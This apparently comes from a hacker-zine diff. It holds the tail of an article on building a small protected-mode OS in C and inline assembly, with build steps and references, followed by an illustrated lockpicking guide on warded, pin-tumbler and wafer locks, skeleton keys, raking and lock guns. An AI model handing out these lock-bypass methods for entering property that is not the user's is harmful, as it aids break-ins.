+
+	/*
+	step 4) execute LGDT instruction to load GDTR with GDT info
+	        recall GDTR = 48-bits
+			            = [32-bit base address][16-bit limit]
+					 HI-bit                       LO-bit
+	*/
+
+	asm "JMP overRdata";
+	asm "gdtr_stuff:";
+	asm "gdt_limit  DW  0C0H";
+	asm "gdt_base   DD  0H";
+	asm "overRdata:";
+
+	/*
+	copy GDT to 0000[0]:0000 ( linear address is 00000000H )
+	makes life easier, so don't have to modify gdt_base
+	REP MOVSB moves DS:[SI] to ES:[DI] until CX=0
+	*/
+
+	asm "MOV AX,OFFSET CS:nullDescriptor";
+	asm "MOV SI,AX";
+	asm "MOV AX,0";
+	asm "MOV ES,AX";
+	asm "MOV DI,0H";
+	asm "MOV CX,0C0H";
+	asm "REP MOVSB";
+
+	asm "LGDT FWORD PTR gdtr_stuff";
+
+	/* step 5) set first bit in CR0, protected mode bit*/
+
+	asm "smsw    ax";
+    asm "or      al,1";
+    asm "lmsw    ax";
+
+	/*
+	step 6) perform a manually coded FAR JUMP
+			( MASM would encode it incorrectly in 'USE16' mode )
+	*/
+
+	asm "DB 66H";
+	asm "DB 67H";
+	asm "DB 0EAH";
+	asm "DW OFFSET _loadshell";
+	asm "DW  8H";
+
+	/* end of the line, infinite loop */
+
+	asm "_loadshell:";
+	asm "NOP";
+	asm "JMP _loadShell";
+
+	return;
+}/*end setUpMemory---------------------------------------*/
+
+/* our GDT has 3 descriptor (null,code,data)*/
+
+void GDT()
+{
+	/*
+	end up treating the function body as data
+	( can treat code as data as long as we don't execute it ;-))
+	*/
+
+	asm "nullDescriptor:";
+	asm "NDlimit0_15			dw	0	; seg. limit";
+	asm "NDbaseAddr0_15			dw	0	; base address";
+	asm "NDbaseAddr16_23		db	0	; base address";
+	asm "NDflags				db	0	; segment type and flags";
+	asm "NDlimit_flags			db	0	; segment limit and flags";
+	asm "NDbaseAddr24_31		db	0	; final 8 bits of base address";
+
+	asm "codeDescriptor:";
+	asm "CDlimit0_15			dw	0FFFFH";
+	asm "CDbaseAddr0_15			dw	0";
+	asm "CDbaseAddr16_23		db	0";
+	asm "CDflags				db	9AH";
+	asm "CDlimit_flags			db	0CFH";
+	asm "CDbaseAddr24_31		db	0";
+
+	asm "dataDescriptor:";
+	asm "DDlimit0_15			dw	0FFFFH";
+	asm "DDbaseAddr0_15			dw	0";
+	asm "DDbaseAddr16_23		db	0";
+	asm "DDflags				db	92H";
+	asm "DDlimit_flags			db	0CFH";
+	asm "DDbaseAddr24_31		db	0";
+
+	return;
+
+}/*end GDT-----------------------------------------------*/
+
+char startStr[7] = {'S','t','a','r','t','\n','\r'};
+char startMemStr[10] = {'I','n','i','t',' ','m','e','m','\n','\r'};
+char tstack[128];
+
+void main()
+{
+	/*set up temp real-mode stack*/
+	asm "MOV AX,CS";
+	asm "MOV SS,AX";
+	asm "MOV AX, OFFSET CSEG:_tstack";
+	asm "ADD AX,80H";
+	asm "MOV SP,AX";
+
+	/*successfully made JMP to OS from boot loader*/
+	printBiosStr(startStr,7);
+
+	/*set up Basic Protected Mode*/
+	printBiosStr(startMemStr,10);
+	setUpMemory();
+
+	return;
+}/*end main-------------------------------------------------------------*/
+
+
+--[ 3.5 - Building and Deploying
+
+Because the OS was written in C and in-line assembler, the build
+process involved three distinct steps. First, I compiled my system code to
+assembly with:
+
+	mcp os.c | mcc > osPre.asm
+
+Note, mcp is Micro-C's pre-processor.
+
+Chuck it all in one 16-bit segment:
+
+    convert osPre.asm
+
+Once I had an .ASM file in my hands, I assembled it:
+
+	ML /Fllist.txt /AT /Zm -c osPre.asm
+
+Note how I've had to use the /Zm option so that I can assemble code that
+obeys conventions intended for earlier versions of MASM. This step is
+typically where the problems occurred. Needless to say, I became tired of
+fixing up segment prefixes rather quickly and that is what led me to
+write convert.c.
+
+Finally, after a few tears, I linked the OS object file to one of Micro-C's
+object files.
+
+	LINK os.obj PC86RL_T.OBJ /TINY
+
+If you look back at convert.c, you'll see a whole load of EXTRN directives.
+All of these imported symbols are math libraries that are located in the
+PC86RL_T.OBJ file.
+
+If you have a copy of NASM on your machine, you can verify your work with
+the following command:
+
+	ndisasmw -b 16 os.com
+
+This will dump a disassembled version of the code to the screen. If you
+want a more permanent artifact, then use the listing file option when you
+invoke ML.EXE:
+
+	ML /AT /Zm /Fl -c os.asm
+
+Once you have the OS and boot sector code built. You should burn them on
+to the boot floppy. You can do so with the DOS debug utility.
+
+C:\DOCS\OS\lab\final>debug boot.com
+-l
+-w cs:0100 0 0 1
+-q
+
+C:\DOCS\OS\lab\final>debug os.com
+-l
+-w cs:0100 0 1 2
+-q
+
+After that, you just boot with the floppy disk and hang on!
+
+I hope this article gave you some ideas to experiment with. Good luck
+and have fun.
+
+"Contrasting this modest effort [of Seymour Cray in his laboratory to
+build the CDC 6600] with 34 people including the janitor with our vast
+development activities, I fail to understand why we have lost our
+industry leadership position by letting someone else offer the world's
+most powerful computer."
+-Thomas J. Watson, IBM President, 1965
+
+"It seems Mr. Watson has answered his own question."
+-Seymour Cray
+
+--[ 4 - References and Credits
+
+[1] Operating Systems: Design And Implementation,
+Andrew S. Tanenbaum, Prentice Hall, ISBN: 0136386776
+	This book explains how the Minix operating system functions.
+	Linux was originally Linus's attempt at creating a production
+	quality version of Minix. Minix is an Intel OS.
+
+[2] MMURTL V1.0, Richard A. Burgess, Sensory Publishing, ISBN: 1588530000
+	MMURTL is another Intel OS. Unlike Tanenbaum, Burgess dives
+	into more sophisticated topics, like memory paging. Another
+  	thing I admire about Burgess is that he'll answer your e-mail
+	without getting snooty like Tanenbaum. If Minix gave birth to
+	Linux, then MMURTL may also be reincarnated as the next big thing.
+
+[3] Dissecting DOS, Michael Podanoffsky, Addison-Wesley Pub,
+ISBN: 020162687X
+	In this book, Podanoffsky describes a DOS clone named RxDOS.
+	RxDOS is presented as a real-mode OS and is written entirely
+	in assembly code.
+
+[4] FreeDOS Kernel, Pat Villani, CMP Books, ISBN: 0879304367
+	Another DOS clone ... but this one is written in C, whew!
+
+[5] Virtual Machine Design and Implementation In C/C++, Bill Blunden,
+Wordware Publishing, ISBN: 1556229038
+	Yes, it's time for the self-plug. Writing a VM is really only a
+	hop, skip, and a jump, from writing a simulator. My book presents
+	all the information in this article and a whole lot more. This
+	includes a complete virtual machine, assembler, and debugger.
+
+[6] Linux Core Kernel Commentary, 2nd Edition, Scott Andrew Maxwell,
+The Coriolis Group; ISBN: 1588801497
+	This is an annotated stroll through the task and memory management
+	source code of Linux.
+
+[7] The Design and Implementation of the 4.4BSD Operating System,
+Marshall Kirk McKusick (Editor), Keith Bostic, Michael J. Karels (Editor)
+Addison-Wesley Pub Co; ISBN: 0201549794
+	These guys are all deep geeks. If you don't believe me, look
+	at the group photo on the inside cover. This book is a
+	comprehensive overview of the FreeBSD OS.
+
+[8] The Undocumented PC : A Programmer's Guide, Frank Van Gilluwe,
+Addison-Wesley Pub, ISBN: 0201479508
+	If you're doing I/O on Intel, it truly helps to have this book.
+
+[9] Control Data Corporation
+	There are a numerous old fogeys from Control Data that I
+	would like to thank for offering their help and advice.
+	Control Data was killed by its management, but there
+	were a handful of gifted engineers, like Cray, who made sure
+	that some of the good ideas found a home.
+
+[10] IBM and the Holocaust: The Strategic Alliance Between Nazi Germany
+and America's Most Powerful Corporation, Edwin Black,
+Three Rivers Press; ISBN: 0609808990
+	I originally heard about this through one of Dave Emory's
+	radio broadcasts. Mae Brussell would agree ... profit at
+	any cost is not a good thing.
+
+I would like to thank George Matkovitz, who wrote the first message-based
+kernel in the world, and Mike Adler, a compiler wizard who was there
+when Cray whipped IBM for sharing their thoughts and experiences with me.
+
+<EOF>
+
+
+|=[ 0x03 ]=--------------------------------------------------------------=|
+
+               L  O  C  K  P  I  C  K  I  N  G
+                             BY
+                    /< n i g h t m a r e
+
+As per usual, I accept no responsibility for your actions using this
+file; It is only here to show how locksmiths gain access when keys are 
+missing or broken.
+
+
+CONTENTS
+
+   INTRODUCTION
+1   The warded Lock
+2   Pin-tumbler lock and wafer locks
+3   Wafer locks
+4   The tension wrench turning tool
+5   Raking pin-tumbler locks and wafer cylinder locks
+6   Picking locks without a Turning tool
+7   The lock gun
+9   Pure picking
+10  Opening locks without picking
+11  Rapping open locks
+12  TOOLS AND APPARATUS
+
+
+
+
+INTRODUCTION
+
+The main purpose of writing this work is to provide the modern student with 
+an up-to-date, accurate book to enable him to explore the fascinating 
+subject of lock picking. In by gone years, people who were drawn to magic of 
+the lock, were tempted to 'pick locks', and were confronted by obstacles to 
+protect the lock, such as devices which would shoot steel barbs into the 
+picker's hands. vicious toothed jaws were employed to cut off the thiefs 
+fingers. perhaps the most fearsome lock pick deterrent was a devilish device 
+which would fire a bullet if the locking mechanism was tampered with.
+
+Books and manuscripts over the years change hands.
+Unfortunately, in the case of this type of work, it could fall into the 
+wrong hands. However unlike such works as '1001 ways to have fun with a 
+Frankfurter', the person who is merely curious will find this work tiresome 
+and unpalatable, leaving the true enthusiasts to explore the teasing allure 
+of the lock. This unique animal who has ingenuity and patience to follow 
+through the fascinating study, will be rewarded in the knowledge that he is 
+in the elite company that I salute in this work. for the people who argue 
+books on this subject should not be written, I would like to point out that 
+a villain who wishes to gain entry into a property in happier with a brick 
+than a pick.
+
+   Have fun and enjoy your new hobby or trade !
+
+
+CHAPTER 1:     THE WARDED LOCK
+
+Probably the best place to begin this book is at the point at which mass 
+lock manufacture began, with the WARDED LOCK. These locks are generally of 
+simple construction, These are of simple construction and generally, and 
+therefore recommended for the beginner. The dictionary defines 'ward' as 'to 
+guard, keep away, or to fend off', which in reality is exactly what the lock 
+does.
+(See FIG. 1.) The small circular section is the ward with the wrong type of 
+key attempting to open the lock. Ti is quite obvious that if this key were 
+to be turned, its turning path would be halted by the protruding ward.
+
+      ___________     ____                      __________    ____
+      ________   )   /  \ \                     ______    )  /  \ \
+              | _|   |  | | <-Wards                   |  [   |  | |
+              |[     \____/                    Bit -> |__[   \____/
+
+             FIG. 1                                  FIG. 2
+
+   FIG. 2 shows the correct key which will open the warded lock.
+It has just the right cuts on the bit to miss the wards. warded locks are 
+found in many forms. FIG. 3 is a normal key, with an intricate patterned bit 
+which would open an old and beautifully designed, elaborate ward lock. At 
+this point, I would like to say that key collecting had become a hobby for 
+many people. Since keys are quite easy to come by, a nice display can soon 
+be obtained.
+
+         __
+        /  \__.,-,________
+        \__/--.,-,--------'
+                        []
+                        [[
+            Normal Key
+
+               FIG. 3
+
+the security of the warded lock was further enhanced by the shape of the key 
+hole, preventing entry to everything apart from the correct key. the 
+extravagant shapes, in both the wards and the key holes, are the only 
+problems which we must overcome in picking open the warded lock. we do this 
+by inserting a pick, which is much thinner than the lock's keyhole, or by 
+using a skeleton key. FIG. 5 shows this best in the case of the skeleton 
+key, which would open the same lock which is in our FIG. 3. This skeleton 
+key has been cut from a blank. The area which would fool the locks ward's 
+has been removed, forming the new key. For the complete newcomer the world 
+of locks, I should explain that the word 'blank' is the name given to the 
+key before it is cut to the desired shape.
+
+                ______                  __.__________
+               |  /\  |                 __ __  __  __|
+               |  ||  |                   ' _||  ||_
+               |   \\ |                    |.-'  '-.|
+               |   // |                    ||      ||
+               |  C|  |            skeleton|'-.  .-'|
+               |  ||  |               key  '--'  '--'
+               |______|
+
+                FIG. 4                       FIG. 5
+
+
+  FIG. 6 looks inside a typical warded padlock. It is clear that, because of 
+the wards which obstruct the turning, only the correct key (as shown) will 
+open this lock. it is guarded by six, close-fitting wards, and also by the 
+small, thin keyhole.
+
+
+                                   _____
+                                  / ___ \
+                               __/ /   \ \__
+                              |    \___/    |
+                              \             /
+                               \____   ____/
+                                   /   \
+                             ______|   |______
+                            |  __ (     ) __  |
+                     .--->  | (__| |   | |__) |
+                     |      |     <     >     |
+        Wards     ---|--->  |  ====|   |====  |
+                     |      |     (     )     |
+                     '--->  | =====|_ _|===== |
+                            | [[[[(_____)]]]] |
+                            |       (_)       |
+                            |_________________|
+                                Y         Y
+                                |         |
+                              Opening spring
+
+FIG. 7 shows how we overcome this lock with a key that has been skeletoned, 
+and which will now open this and many others.
+This has been achieved by removing all the projections other than the end 
+which comes into contact with the spring-opening point.
+Take a look and make sure you read and understand this before moving on.
+
+                                       __
+                            _   __nn_n/  \_
+                           (_| |______   o_:
+                                _ __ _\__/
+                                U UU U
+
+                                  FIG. 7
+
+  FIG. 8 is a warded pick in it's most simple form - a coil spring with it's 
+end bend and flattened. If the coil is of suitable diameter, it will fit 
+onto the end of your index finger. This forms, as it were, an extension of 
+your finger, and you will find that it is a highly sensitive tool to fell 
+the layout of the interior and so find and trigger the mechanism. This 
+sensitive manipulation can be achieved only with practice. If the spring 
+pick becomes weak or bent simply pull out a new length from the coil and you 
+have a brand new tool.
+
+  Before we move on, I would suggest that you build up a large set of picks 
+of different sizes.
+
+                     ________________________________________
+                    |                                 ____   |
+                    |  /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/    |  |
+                    |________________________________________|
+                                  Coil Spring
+
+                                    FIG. 8
+  Look inside as many locks as possible -- it's the finest way of becoming a 
+lock expert. picking locks is a true art form and even more difficult than 
+learning to play a musical instrument proficiently.
+
+Here is a useful lock picking set to make:
+                                 ____
+                                /    \_____________|
+                                \____/             |
+                                 ____
+                                /    \_____________.
+                                \____/             '
+                                 ____
+                                /    \___________._.
+                                \____/           ' '
+                                 ____
+                                /    \_____________
+                                \____/             |
+                                 ____
+                                /    \___________|_|
+                                \____/           | |
+                                 ____
+                                /    \____________.-
+                                \____/            '-
+                                      FIG. 9
+
+
+In summing up the subject of warded locks, I would say that once you have 
+clearly understood that the wards simply guard the opening, and also that 
+the actual shape of the keyhole prevents the wrong key entering, you are 
+well on the right path to becoming a total master at this type of lock. 
+start looking for warded locks: they are usually older locks or at the cheap 
+end of the market.
+
+The most difficult task before the novice must be to identify the particular 
+type of lock he is trying to pick. Is the lock a WAFER or PIN-TUMBLER? Or, 
+in the case of the raw beginner, is the lock a LEVER or PIN-TUMBLER? There 
+is no simple answer. The ability to identify the particular types comes only 
+with practice and study.
+Open up as many old locks as you can and study the principles, LOOKING ALL 
+THE TIME FOR WEAK POINTS which are built into the design. Believe me, ALL 
+locks have weak points.
+
+
+CHAPTER 2: PIN TUMBLER and WAFER LOCKS
+
+As in all lock picking, it is an advantage that the student is fully 
+conversant with the basic operation of the lock. In the case of the 
+PIN-TUMBLER and WAFER it is absolutely vital. The number of times I have 
+read leading works on the subject, and then asked myself if I would fully 
+understand how the lock worked from their description ! each book I read 
+failed to explain accurately and precisely how these locks work and can be 
+picked. what follows is my own humble effort to right this wrong. You 
+yourself must judge if I have obtained this objective.
+
+  When we first look at this type of lock, it would appear that all 
+necessary to insert a small implement into the keyway and give it a turn for 
+the device to open. plainly this is not the case, as we can see when we take 
+a closer look at FIG. 10 This is a typical PIN-TUMBLER lock, and generally 
+consists of pairs of bottom pins made from brass and with the top drivers 
+formed in steel. Commonly, five pairs of pins are found. in the smaller, 
+cheaper models, four are more common.
+
+   ______________________________
+                                 \ K
+           |  |  |  |   |   |    / E
+              |     |   |   |    \ Y        [|]  Upper tumbler pin
+           ^     ^               / H        [^]  Lower tumbler pin
+           ^  ^  ^  ^   ^   ^    \ O        [-]  Cylinder wall
+                                 / L  This is a greatly simplified
+                                 \ E  drawing
+   ______________________________/
+
+         FIG. 10
+
+
+            _______
+Shear Line /  ___  \
+  - - - - -| |///| |   <-- Springs
+          /  |[ ]|<-\----- Top Drivers
+      Plug\  \ @ /<-/----- Bottom Pins
+           \___|___/
+                     Key
+
+         FIG. 11
+
+             _______
+Shear Line /  ___  \
+   - - - - -| |///| |
+           /  |[ ]| /\
+           \     / / / <-- Plug Turning
+            \___///_/
+
+                   FIG. 11a
+
+
+                                                    ________
+                                                   /        \
+         Shearing Line -->  __ _ ___ _ ___ _ ___  /          \  A
+                           / _  _  _  _  _      \/       /\   \
+                          / |_||_||_||_||_| ___/\        \/   / K
+                          \ / \/\/\/\/\/\/\____\/            /  E
+                           \____________________/\__________/   Y
+
+               FIG. 12
+
+FIG. 11 is the end-view of the arrangement. Each of the locks shown in FIGS. 
+10, 11 and 12 are ready to open, since in each case they have been given the 
+right key ready to turn the plug.
+FIG. 12 shows each of the five bottom brass pins settled into it's own notch 
+along the key. This ha the effect of bringing the point between the drivers 
+and the pins EXACTLY to the same height. ONLY THE PROPER KEY WILL ALIGN ALL 
+FIVE PINS AT THIS HEIGHT, WHICH WE CALL THE SHEAR OR SHEARING LINE, AT THE 
+SAME TIME. All five pins must be in line together, and, when we have this 
+state of affairs, the plug will turn opening the lock. FIG. 11a shows the 
+plug starting to turn. FIG. 11 is an end-view, and shows the shaded plug 
+ready to turn. Make sure you fully understand this before you go on. Most 
+students fail to understand that the bottom brass pins TURN WITH THE PLUG. 
+FIG. 13 shows this. the top holding drivers stay put in the chambers in the 
+outer case. Remember that the bottom pins must turn with the plug because 
+they are contained within unit. It is important to know that if only one 
+notch on the key is even SLIGHTLY wrong, too high or too low, the plug would 
+be prevented from turning, just one pin, sitting into this plug from the 
+outer case, has such an amazing strength that it would be impossible to snap 
+-- such is the power of each little pin.
+
+
+         :::::
+     ___ ##### <-- Top Drivers
+    /   \ooooo Plug Turning |
+    \___/=====             <'
+         OOOOO <-- Bottom pins
+
+        FIG. 13
+
+I have cut away the plug in FIG. 13 and the pins can clearly be seen in the 
+turning motion. With all the required points within the lock aligned, the 
+plug must and will turn. However, let us take a look at what would happen if 
+the wrong key were inserted. FIG. 14 shows this, with the top drivers, still 
+inside the plugs, preventing it from turning. The wrong key is just as bad 
+as no key, and the lock stays locked.
+
+                          Chambers
+                    ______/___|___\______
+                   |     /    |    \     |
+                   |    \/    V    \/    |
+                   |       __   __   __  |
+           --------|  __  |  | |  | |  | |-------- <-- Shear line
+         Plug --> _|_|  |_|  |_|  |_|  |_|_
+                 [ | |  | |  | |  | |  | | ]
+                 [ | '--' '--' '--' '--' | ]
+                 [ | .--. .--. .--. .--. | ]
+                 [ | '--' '--' '--' '--' | ]
+                 [_|_____________________|_]
+                   '---------------------'
+                               FIG. 14
+
+FIG. 15 is the end-view, showing the top driver inside the plug, preventing 
+the turning, and the driver just below the shearing line. I have already 
+said that these little drivers are manufactured from steel and are very 
+strong indeed, overcoming any force that a normal wrong key or instrument 
+could present. even if there were only one little driver inside the plug, it 
+would still be unable to rotate, or be snapped at the shear line. Now 
+multiply that strength by five, and I am sure that you will understand it's 
+almost superhuman strength. Before I move on I must explain that there a no 
+skeleton keys which will magically open this lock, or it's brother the 
+WAFER.
+
+                   Note top drivers are inside plug
+                           ______        preventing any turning
+                          /______\
+                         //  ==  \\
+                         ||  ==  ||
+                         ||  ()  ||
+  Shearing line --> -----||-[||]-||-----
+                         || [==] ||
+                         \\__##__//       ## - Bottom pins
+                          \______/       [==]  Plug
+
+                          FIG. 15
+
+The turning tool replaces the bottom part of the key, and the pick replaces 
+the notches on the key. Just think of the turning tool as part of the key, 
+and the pick as the notches. Once you have all the points inside the line, 
+only a small amount of light pressure is needed to turn the plug. Most books 
+on the subject stress that too much pressure is wrong. FIG. 20 shows the top 
+driver inside the chamber binding on three points, because the tension is 
+too great. Trial and error seems to be the only true way, with only light 
+turning applied.
+
+
+Chapter 3:      WAFER LOCKS
+
+FIG. 16 shows a single-sided wafer lock. This type of lock contains WAFERS 
+instead of pins and drivers, and is known as a DISC-TUMBLER instead of a pin 
+tumbler. the wafers, five as in a pin-tumbler, are held in place by a small, 
+light spring, as shown (left hand side) of FIGS. 16 and 17. FIG. 16 shows 
+the lock closed, and FIG. 17 open. The wafer lock is best opened by RAKING, 
+which is explained later in this work.
+
+
+
+
+           ________                        ________
+          /   __   \                      /   __   \
+         =|  /  \  |                     =|  /  \  |
+         =|  |  |  |                     =|  |  |  |
+         /_  \__/  |                     /_  \__/  |
+          \__    __/                      \__    __/
+          --.\__/.--                      __ \__/ __
+            '----'                          '____'
+            Locked                         Unlocked
+
+           FIG. 16                          FIG. 17
+
+
+Chapter 4:   THE  TENSION  WRENCH  TURNING  TOOL
+
+Probably the single most important factor in lock manipulation is the use of 
+the TENSION WRENCH which I prefer to call the TURNING TOOL. perhaps if it 
+had been given this name in the first place, hundreds of aspiring locksmiths 
+would have had greater instant success. I maintain that the word 'tension' 
+implies that great pressure has to be exerted by this tool. Add to this the 
+word 'wrench' and totally the wrong impression is given. in order that you 
+will fully understand the use of this turning tool, I will explain it's 
+simple function. FIG. 18 shows an normal pin-tumbler or wafer key; FIG. 19 
+shows the key cut away. This bottom section is now a turning tool. the 
+reality is that the notches along the key would lift the bottom pins level 
+with the shearing line, and the part beneath would turn the plug.
+
+
+
+
+
+     ____                   ____    ,_^^,^,-.-^.
+    /    \,_^^,^,-.-^.     /    \/'_____________
+    \____/-----------'     \____/---------------'  <-- Turning tool
+
+         FIG. 18                   FIG. 19
+
+
+The turning tool replaces the bottom part of the key, and the pick replaces 
+the notches on the key. Just think of the turning tool as part of the key, 
+and the picks as the notches. Once you have all of the points inside the 
+line, only a small amount of light pressure is needed to turn the plug. Most 
+books on the subject stress that too much pressure is wrong. The student 
+must first know why too much tension is wrong. FIG. 20 shows the top driver 
+inside the chamber binding on the tree points, because the tension is too 
+great. Trial and error seems to be the only true way, with only light 
+turning applied
+
+                                    ___________
+                                   |  ------. <|----Spring
+                                   |  .-----'  | Top chamber
+                                   |  '-----.  |
+                                   |  .-----'  |
+                                   | _'--_____ | Binding
+                                   ||         || |
+                                   ||         || V
+                             ______||         ||______
+                             ------.|_________|.------ Shear line
+                                   |           | <-- Binding
+
+
+
+                                      FIG. 20
+
+If you are raking open a lock, no real pressure need be applied because the 
+pins and wafers MUST be free to bounce into line with the shearing line. if 
+too much pressure is used, it prevents this as shown in FIG. 20. Multiply 
+the one shown by, and you can imagine the lock is well and truly bound 
+tight. I have used a lot of words in trying to say what has not been put in 
+print before.
+
+
+                                  |
+                    --------------'
+
+                                  |
+                   .--------------'
+                   |  TURNING TOOLS
+
+                                FIG. 21
+
+The turning tools are shown in FIG. 21. Once again, I get onto my high 
+horse, and say that it is not necessary to have lots of different turning 
+tools in your kit. it is complete nonsense to have light, medium and heavy 
+tools. Further confusing the is the term used to rigidity of the different 
+types. This is termed the 'weight', but most of my students mistakenly 
+assume the actual weight is important to the turning potential. the best is 
+to choose a medium weight tension wrench and from then on call it a turning 
+tool. If I am not careful I will change the whole lock picking vocabulary.
+
+  The best and easiest wafer or pin-tumbler locks to open are the ones which 
+contain the smaller pin or wafer sizes together in the same lock, i.e. small 
+pins in each chamber and ideally all about the same length. When this state 
+exists, the method to open the lock is by RAKING.
+
+
+Chapter 5:      RAKING PIN-TUMBLER AND WAFER CYLINDER LOCKS
+
+The first plan of attack on any lock of this type, whether it is a padlock 
+protected with this locking arrangement, a door on a car or a house, is to 
+try raking. the turning tool fits into the bottom section of the keyway, as 
+shown in FIG. 22, with just the weight of your finger. No visible bend 
+should be seen on the tool, otherwise it will be found impossible to pick 
+open the lock with this method.
+
+
+                       ________________________
+                      /                        \   the tools got to
+                     /                          \  be at 45 DEG.
+                    /          ______            \ parallel like
+                    \         / n    \           / so:  //
+                     \  ********@____/          /
+                      \        /               /  *** the pick
+                       \      /               /   /   turning tool
+                        \____/_______________/
+
+                                 FIG. 22
+
+  Using the picks shown in FIG. 23, we rake the lock, as we shall explain 
+later, starting with pick number one and working up through until you open 
+the lock. Perhaps, before we get down to the actual method of raking, we had 
+better take a close look at the make-up of this tool, known as a RAKE. Look 
+again at FIG. 23. Notice that 1B is just the same as 1A except that it has 
+been cut in half, giving the half double ball. 1C is a silhouette of them 
+both.
+
+  If we look closely at 2A, 2B and 2C, we find they are arranged just the 
+same as the first group. 3A, 3B and 3C are know as DIAMONDS because of their 
+shape. There seems to be no reason for A, B and C in each of the groups 1, 2 
+and 3 other than, in the case of the diamonds, for use in smaller locks. 
+Don't let the different sizes bother you, but just use whatever you have in 
+your set.
+
+RAKING TOOLS
+
+FIG. 23
+
+    1A            1B           1C
+     |
+     -         |       /
+     |        /|       \
+    / \      / \      / \
+    | |      | |      | |
+    | |      | |      | |
+    | |      | |      | |
+    | |      | |      | |
+    | |      | |      | |
+    |_|      |_|      |_|
+
+  Double         Half     Silhouette
+   Ball         Double      Double
+   Rake       Ball Rake   Ball Rake
+
+    2A            2B           2C
+      o
+      |       o         /
+     /\        \        |
+    /  \      / \      / \
+    |  |      | |      | |
+    |  |      | |      | |
+    |  |      | |      | |
+    |  |      | |      | |
+    |  |      | |      | |
+    |__|      |_|      |_|
+
+Full single  Half Single   Silhouette
+Ball Rake     Ball Rake  Single Ball Rake
+
+    3A      3B     3C
+     <           <|                 _               |>
+      |    <|     |                /_|              ||    Handy
+      |    /|     |                 ||              ||    Double
+     /|   / |    /|            4    ||              ||    Ended
+    | |   | |   | |                 ||              ||    Rake
+    | |   | |   | |                 ||              ||
+    | |   | |   | |                 ||              ||
+    | |   | |   | |                /  \             ||
+    | |   | |   | |                |  |              \\
+    |_|   |_|   |_|               /____\             //
+
+     3 Diamond Rakes
+
+  In FIG. 23 I have included a number 4, which is sometimes mistaken by 
+students for a raking tool, but which is, in fact, a broken key extractor, 
+and has nothing to do with raking. I have shown it's end in close up in the 
+illustration so that there can be no mistake. The number 5 is a double-ended 
+rake, which combines on one end a diamond and on the other a silhouette 
+double ball.
+
+HOW RAKING WORKS
+
+  While we are taking a close look at things, it is a good time to do the 
+same thing with the action of raking, in order that you will fully 
+understand how it works. Select any of the number 1 raking tools (FIG. 23), 
+and insert it into the lock so that it touches the back of the lock and is 
+in contact with the back bottom pin of the lock. The pick is then drawn from 
+the back of the lock very quickly (see FIG. 24).
+
+
+                              Rake is pulled out
+                              causing top driver
+                              and bottom pin to
+              =====  =====  =====  =====  =====    vibrate about the
+              =====  =====  =====  =====  =====    shear line.
+                                          .---.
+              .---.  .---.  .---.  .---.  | ^ |
+              |   |  |   |  |   |  |   |  | | |
+Shearing      |   |  |   |  |   |  |   |  | V |       Shearing
+Line   ______ '---'  '---'  '---'  '---'  '---' _____ Line
+              .---.  .---.  .---.  .---.  .---.
+  Front of    |   |  |   |  |   |  |   |  | ^ |  Back
+  Lock        '---'  '---'  '---'  '---'  '-v-'_ of the
+  /-\_________________________________________/ \
+ (______________________________________________/
+                  Rake being pulled out
+                 <---------------
+
+This action has the effect of causing all the pins, which have been in 
+contact momentarily with the rake's passage out of the cylinder to vibrate, 
+each pin lifts the top driver out of the plug with this vibrating momentum 
+given> The whole thing is really a bit hit and miss, because some of the top 
+drivers will be out will others are still holding the plug. We must repeat 
+with the same rake about twenty times, and only if unsuccessful then move on 
+to another, following the pattern outlined in FIG. 23.
+
+  When we rake a lock, we are raising the pins inside the lock to the shear 
+line. moving through the different shaped picks varies the pattern of the 
+lift as the tool is repeatedly drawn out. The pins and drivers are bouncing 
+about the shear line, just waiting to please you and be at the right height 
+to open as you turn with your turning tool, which has been in place 
+throughout. I MUST STRESS THAT THE TURNING TOOL HAS NOT BEEN EXERTING A 
+CONSTANT TURNING PRESSURE, OTHERWISE THE PINS WOULD BIND, AS SHOWN IN FIG. 
+20. The pressure exerted is best described as a pulsating one. Gentle 
+pressure must only be on as the rake is leaving the lock on the way out. No 
+pressure is on as the pins are vibrating. The pins vibrate and the pulsating 
+turning tool turns the plug, so opening the lock. If too much pressure is 
+applied at the opening wrong moment, binding takes place and picking is 
+impossible.
+
+  Normally, I first test a lock by inserting my Turing tool into the lock, 
+turning it in both directions. Any slight movement tells me a few things 
+about the locks without actually seeing inside it. If has a lot of movement 
+in each direction, then it is going to be an easy lock to open. Its general 
+condition tells me if it is an old, worn or cheap lock. if you find little 
+movement an the lock is known to be a good one, then it is going to take a 
+little longer or require another technique.
+
+
+Chapter 6:      PICKING LOCKS WITHOUT A TURNING TOOL
+
+A useful tip, for those long practice sessions or demonstrations, is to bend 
+the connecting cam downwards as shown in FIG. 25. If the lock is held as 
+shown in FIG. 26 you will find that it eliminates the use of the turning 
+tool. My advice to the beginner is to try raking with the index finger, 
+pulsating on the lock's cam.
+
+
+ _
+( )----------.
+| |__________|____
+| |               )_
+| |                 )
+| |                  )____
+| |      LOCK        )---.|
+| |                _)   ^||
+| |            ___)    / ||
+| |           |       /  '' <-- Cam
+(_)-----------'     BEND
+
+     FIG. 25
+
+                   _
+                  / \____   Finger provides
+                 /   \ \_) <-----  turning
+                /___/-\ \
+               /   /  (__)
+                      _||_
+                     (____)
+                       ||
+                       ||
+                       ||
+                       ||
+                       ||
+                       ||
+             FIG. 26   '' Pick held in other hand
+
+  Another practice tip is to remove two sets of pins and drivers, leaving 
+three sets within the lock, thereby reducing the strength and making it a 
+little easier to manipulate.
+
+Chapter 7:      THE LOCK GUN
+
+This useful tool is really a super raking device. pulling the trigger causes 
+the needle probes to flick upwards, and this has the effect of bouncing the 
+pins about the shearing line. this tool is capable of producing a continuous 
+vibration of the pins, making picking easy. It is a useful tool, and a nice 
+addition to your toolkit. The gun is shown in FIG. 27.
+
+
+
+   _______/\
+<.|-        \__
+   \           \_______
+    \           |_/
+    /  .   _____|      =[]
+   /      | \\            \
+  /      /   \\            \__
+/  .   /    (|
+|_____/               .------
+           Lock Gun    |
+
+         FIG. 27
+
+
+Chapter 8:      THE LOCK MASTER
+
+Before we leave raking, perhaps we had better look at my own invention, the 
+LOCK MASTER, which has certain advantages over the lock gun, and even more 
+disadvantages. That said, its main advantage is a big one -- it completely 
+eliminates the need for a turning tool. Its bottom section has its own 
+turning tool built in. FIG. 28 shows the tool. the top is flicked with the 
+index finger nail, and the probe is returned to the horizontal by means of 
+two small springs. the finger snaps away while the master is twisted, again 
+in the pulsating fashion. The main disadvantage is that you have to have 
+different LOCK MASTERS for different size lock.
+
+
+       ________________
+      /----------#-(.)-\-
+            ___________#_(.)_
+           (______________   )____   Lock Master
